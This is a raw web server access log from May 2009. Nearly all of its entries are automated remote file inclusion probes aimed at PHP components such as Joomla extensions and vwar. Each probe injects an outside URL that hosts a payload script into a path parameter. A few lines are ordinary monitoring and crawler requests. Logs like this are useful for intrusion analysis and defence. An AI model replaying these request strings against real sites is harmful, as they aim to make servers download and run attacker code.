216.221.10.116 - - [30/May/2009:00:29:34 -0400] "GET /logs/access_log.Q109051700//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
87.230.85.142 - - [30/May/2009:00:29:45 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
87.230.85.142 - - [30/May/2009:00:29:45 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 200 3433 "-" "Mozilla/5.0"
87.230.85.142 - - [30/May/2009:00:29:45 -0400] "GET /logs/access_log.Q109050300%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
209.59.12.99 - - [30/May/2009:00:31:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
85.214.83.196 - - [30/May/2009:00:31:44 -0400] "GET //error.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:31:44 -0400] "GET /logs//error.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:31:44 -0400] "GET //error.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:31:44 -0400] "GET /logs/access_log.Q109052100//error.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:31:44 -0400] "GET //error.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:31:44 -0400] "GET /logs//error.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:31:44 -0400] "GET //error.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:31:45 -0400] "GET /logs//error.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:31:45 -0400] "GET /logs//error.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:31:45 -0400] "GET /logs/access_log.Q109052100//error.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:31:45 -0400] "GET //error.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:31:45 -0400] "GET /logs/access_log.Q109052100//error.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:31:45 -0400] "GET /logs/access_log.Q109052100//error.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:31:45 -0400] "GET /logs//error.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:31:45 -0400] "GET /logs/access_log.Q109052100//error.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:31:47 -0400] "GET //error.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:31:47 -0400] "GET /logs//error.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:31:47 -0400] "GET /logs/access_log.Q109052100//error.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:31:53 -0400] "GET /logs/access_log.Q109051500//error.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:31:54 -0400] "GET /logs/access_log.Q109051500//error.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:31:55 -0400] "GET /logs/access_log.Q109051500//error.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:31:58 -0400] "GET /logs/access_log.Q109051500//error.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:31:59 -0400] "GET /logs/access_log.Q109051500//error.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:31:59 -0400] "GET /logs/access_log.Q109051500//error.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:31:59 -0400] "GET //error.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:31:59 -0400] "GET //error.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:31:59 -0400] "GET //error.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:31:59 -0400] "GET /logs//error.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:32:00 -0400] "GET /logs//error.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:32:00 -0400] "GET /logs/access_log.Q109052100%20%20//error.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:32:00 -0400] "GET /logs//error.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:32:00 -0400] "GET /logs/access_log.Q109052100%20%20//error.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:32:00 -0400] "GET /logs/access_log.Q109052100%20%20//error.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
216.221.10.116 - - [30/May/2009:00:32:07 -0400] "GET /logs/error_log.Q109051700//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:32:10 -0400] "GET /logs/access_log.Q109051500%20%20//error.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:32:10 -0400] "GET /logs/access_log.Q109051500%20%20//error.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:32:11 -0400] "GET /logs/access_log.Q109051500%20%20//error.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
65.98.80.2 - - [30/May/2009:00:32:20 -0400] "GET /logs/error_log.Q109051700//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
65.98.80.2 - - [30/May/2009:00:32:22 -0400] "GET /logs/error_log.Q109051700//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
65.98.80.2 - - [30/May/2009:00:32:24 -0400] "GET /logs/error_log.Q109051700//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
216.119.103.12 - - [30/May/2009:00:32:41 -0400] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
216.119.103.12 - - [30/May/2009:00:32:42 -0400] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:33:30 -0400] "GET /logs/access_log.Q109052100//error.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:33:30 -0400] "GET //error.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:33:30 -0400] "GET /logs//error.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:33:34 -0400] "GET //error.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:33:34 -0400] "GET /logs/access_log.Q109051500//error.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:33:34 -0400] "GET /logs//error.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:33:34 -0400] "GET /logs/access_log.Q109052100//error.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
216.119.103.12 - - [30/May/2009:00:33:37 -0400] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
216.119.103.12 - - [30/May/2009:00:33:37 -0400] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:33:37 -0400] "GET /logs/access_log.Q109051500//error.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:33:39 -0400] "GET /logs/access_log.Q109052100//error.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:33:39 -0400] "GET //error.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:33:39 -0400] "GET /logs//error.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:33:44 -0400] "GET /logs/access_log.Q109051500//error.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
91.149.157.130 - - [30/May/2009:00:33:57 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
91.149.157.130 - - [30/May/2009:00:33:57 -0400] "GET /logs/access_log.Q109051700//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
91.149.157.130 - - [30/May/2009:00:33:57 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
91.149.157.130 - - [30/May/2009:00:34:06 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
91.149.157.130 - - [30/May/2009:00:34:06 -0400] "GET /logs/access_log.Q109051700//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
91.149.157.130 - - [30/May/2009:00:34:06 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
85.17.162.28 - - [30/May/2009:00:35:04 -0400] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:00:35:04 -0400] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:00:35:04 -0400] "GET /logs/access_log.Q108021800/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
74.52.2.130 - - [30/May/2009:00:35:09 -0400] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.810"
85.17.162.28 - - [30/May/2009:00:35:22 -0400] "GET /logs/access_log.Q108072800/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
75.125.245.26 - - [30/May/2009:00:36:02 -0400] "GET /logs/////////?mosConfig_absolute_path=http://www.jspipesanddrums.com/photos/footer.gif?? HTTP/1.1" 200 3440 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
75.125.245.26 - - [30/May/2009:00:36:02 -0400] "GET /////////?mosConfig_absolute_path=http://www.jspipesanddrums.com/photos/footer.gif?? HTTP/1.1" 200 459 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
64.6.231.215 - - [30/May/2009:00:36:06 -0400] "GET //components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.waisikkai.com//components/com_registration/test.txt??? HTTP/1.1" 404 250 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
64.6.231.215 - - [30/May/2009:00:36:06 -0400] "GET /logs//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.waisikkai.com//components/com_registration/test.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
209.59.12.99 - - [30/May/2009:00:36:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
74.208.111.178 - - [30/May/2009:00:36:33 -0400] "GET //admin/business_inc/saveserver.php?thisdir=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
74.208.111.178 - - [30/May/2009:00:36:33 -0400] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
74.208.111.178 - - [30/May/2009:00:36:33 -0400] "GET /logs/access_log.Q108062200//admin/business_inc/saveserver.php?thisdir=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
74.208.111.178 - - [30/May/2009:00:36:38 -0400] "GET /logs/access_log.Q109050700//admin/business_inc/saveserver.php?thisdir=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:37:05 -0400] "GET /logs/index2.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:37:05 -0400] "GET /logs/access_log.Q109051500%20%20/index2.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:37:05 -0400] "GET /index2.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
69.50.197.106 - - [30/May/2009:00:37:35 -0400] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
69.50.197.106 - - [30/May/2009:00:37:35 -0400] "GET //admin/business_inc/saveserver.php?thisdir=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
69.50.197.106 - - [30/May/2009:00:37:35 -0400] "GET /logs/access_log.Q108062200//admin/business_inc/saveserver.php?thisdir=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
69.50.197.106 - - [30/May/2009:00:37:36 -0400] "GET //admin/business_inc/saveserver.php?thisdir=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
69.50.197.106 - - [30/May/2009:00:37:36 -0400] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
69.50.197.106 - - [30/May/2009:00:37:36 -0400] "GET /logs/access_log.Q108062200//admin/business_inc/saveserver.php?thisdir=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:37:40 -0400] "GET /logs/access_log.Q109052100%20%20//error.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
69.50.197.106 - - [30/May/2009:00:37:40 -0400] "GET /logs/access_log.Q109050700//admin/business_inc/saveserver.php?thisdir=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
69.50.197.106 - - [30/May/2009:00:37:40 -0400] "GET /logs/access_log.Q109050700//admin/business_inc/saveserver.php?thisdir=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
91.149.157.130 - - [30/May/2009:00:37:42 -0400] "GET /logs/access_log.Q109051800//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
85.214.83.196 - - [30/May/2009:00:37:43 -0400] "GET /logs/access_log.Q109052100%20%20//error.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:37:44 -0400] "GET /logs/access_log.Q109050300%20%20/index2.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:37:52 -0400] "GET /logs/access_log.Q109051500%20%20//error.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
91.149.157.130 - - [30/May/2009:00:37:53 -0400] "GET /logs/access_log.Q109051800//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
85.214.83.196 - - [30/May/2009:00:37:53 -0400] "GET /logs/access_log.Q109051500%20%20//error.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:37:59 -0400] "GET /logs/access_log.Q109052100%20%20//error.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:37:59 -0400] "GET /logs/access_log.Q109051500%20%20//error.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
194.126.110.134 - - [30/May/2009:00:38:25 -0400] "GET /errors.php?error=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
194.126.110.134 - - [30/May/2009:00:38:25 -0400] "GET /logs/errors.php?error=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
194.126.110.134 - - [30/May/2009:00:38:25 -0400] "GET /logs/access_log.Q109051000/errors.php?error=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
194.126.110.134 - - [30/May/2009:00:38:27 -0400] "GET /logs/access_log.Q109051500/errors.php?error=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.51.131.210 - - [30/May/2009:00:38:36 -0400] "GET /logs/////////?mosConfig_absolute_path=http://www.jspipesanddrums.com/photos/footer.gif?? HTTP/1.1" 200 3440 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
209.51.131.210 - - [30/May/2009:00:38:37 -0400] "GET /////////?mosConfig_absolute_path=http://www.jspipesanddrums.com/photos/footer.gif?? HTTP/1.1" 200 459 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
74.208.111.178 - - [30/May/2009:00:38:42 -0400] "GET /logs/access_log.Q108062200%20%20//admin/business_inc/saveserver.php?thisdir=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
74.208.111.178 - - [30/May/2009:00:38:43 -0400] "GET /logs/access_log.Q109050700%20%20//admin/business_inc/saveserver.php?thisdir=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:00:38:56 -0400] "GET /logs/access_log.Q108021800%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:00:39:00 -0400] "GET /logs/access_log.Q108021800%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:00:39:03 -0400] "GET /logs/access_log.Q108072800%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:00:39:09 -0400] "GET /logs/access_log.Q108072800%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
69.50.197.106 - - [30/May/2009:00:39:12 -0400] "GET /logs/access_log.Q108062200%20%20//admin/business_inc/saveserver.php?thisdir=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
69.50.197.106 - - [30/May/2009:00:39:12 -0400] "GET /logs/access_log.Q109050700%20%20//admin/business_inc/saveserver.php?thisdir=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
69.50.197.106 - - [30/May/2009:00:39:18 -0400] "GET /logs/access_log.Q108062200%20%20//admin/business_inc/saveserver.php?thisdir=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
69.50.197.106 - - [30/May/2009:00:39:18 -0400] "GET /logs/access_log.Q109050700%20%20//admin/business_inc/saveserver.php?thisdir=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
121.130.29.11 - - [30/May/2009:00:40:04 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.pintoresenaccion.com/administrator/components/com_virtuemart/idfx1.TXT?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
121.130.29.11 - - [30/May/2009:00:40:04 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.pintoresenaccion.com/administrator/components/com_virtuemart/idfx1.TXT?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
121.130.29.11 - - [30/May/2009:00:40:04 -0400] "GET /logs/access_log.Q108112300%20%20//include/mail.inc.php?skin_board_path=http://www.pintoresenaccion.com/administrator/components/com_virtuemart/idfx1.TXT?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:00:40:16 -0400] "GET /logs/access_log.Q108021800%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
194.126.110.134 - - [30/May/2009:00:40:25 -0400] "GET /logs/access_log.Q109051000%20%20/errors.php?error=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
194.126.110.134 - - [30/May/2009:00:40:25 -0400] "GET /logs/access_log.Q109051500%20%20/errors.php?error=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:00:40:28 -0400] "GET /logs/access_log.Q108072800%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
66.249.68.76 - - [30/May/2009:00:41:22 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L3081C94317D147004B6D043+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [30/May/2009:00:41:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
124.217.216.86 - - [30/May/2009:00:42:12 -0400] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.jspipesanddrums.com/photos/footer.gif?? HTTP/1.1" 404 230 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
124.217.216.86 - - [30/May/2009:00:42:12 -0400] "GET //include/print_category.php?setup[use_category]=1&dir=http://www.jspipesanddrums.com/photos/footer.gif?? HTTP/1.1" 404 225 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
85.17.162.28 - - [30/May/2009:00:42:37 -0400] "GET /convert/mvcw.php?vwar_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:00:42:37 -0400] "GET /logs/convert/mvcw.php?vwar_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:00:42:38 -0400] "GET /logs/access_log.Q108031900/convert/mvcw.php?vwar_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:00:42:43 -0400] "GET /convert/mvcw.php?vwar_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
